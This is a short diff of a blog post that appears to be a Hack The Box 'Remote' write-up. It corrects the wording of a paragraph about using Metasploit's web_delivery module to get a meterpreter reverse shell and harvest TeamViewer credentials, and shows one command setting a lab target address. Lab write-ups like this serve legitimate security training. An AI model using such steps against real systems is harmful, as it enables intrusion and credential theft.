ColdFusionX/ColdFusionX.github.io/_posts/2020-09-07-RemoteHTB.md

 ## TeamViewer Module- Metasploit

-We can autopwn and find the crendentials using the Metasploit module,First we need to get a meterpreter reverse shell using `web_delivery` exploit module.
+We can autopwn and find the credentials using the Metasploit module, First we will get a `meterpreter` reverse shell using `web_delivery` exploit module.

 ```shell
 msf5 exploit(multi/script/web_delivery) > set RHOST 10.10.10.180